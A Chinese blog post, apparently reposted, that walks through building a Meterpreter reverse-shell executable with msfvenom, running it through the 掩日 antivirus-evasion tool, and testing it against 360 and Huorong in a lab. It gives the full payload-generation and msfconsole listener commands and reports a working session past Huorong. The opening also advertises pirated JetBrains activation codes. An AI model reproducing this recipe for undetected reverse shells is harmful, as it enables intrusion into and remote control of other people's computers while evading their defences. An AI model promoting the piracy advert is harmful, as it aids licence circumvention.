大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。
Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺
微信公众号:乌鸦安全
扫取二维码获取更多信息!
1. 环境
攻击机: kali linux 10.211.55.23
受害机: Windows10 360主动防御
Windows7 火绒主动防御
2. 生成exe文件
在kali linux下使用msfvenom生成一个64位的exe文件
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe -o 1.exe
将文件分别发送至Windows10上,此时需要将受害者的机器关闭全部杀软
使用掩日3.0进行免杀处理(这里会提示报错,需要安装一个软件,按照提示安装即可)
下载地址:
https://github.com/1y0n/av_evasion_tool/
将文件直接拖过来就行了
最后会生成一个YR_1.exe文件
将这两个文件分别压缩备份,发送到window10和window7上
3. 静态测试
打开各自的杀软进行测试
3.1 360
均报毒
3.2 火绒
只有一个文件报毒
4. 上线测试
4.1 攻击机配置
msfconsole
use exploit/multi/handler
set LHOST 10.211.55.23
set LPORT 4444
set payload windows/x64/meterpreter/reverse_tcp
exploit
4.2 360下
4.2.1 1..exe
直接gg
4.2.2 免杀版1.exe
直接gg
4.3 火绒
4.3.1. 1.exe
gg
4.3.2 免杀版1.exe
上线正常
执行命令
5. 总结
总体上来说,这款免杀工具已经是非常强了,而且公开了这么久,还支持部分免杀,很厉害了!?
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/171412.html原文链接:https://javaforall.net
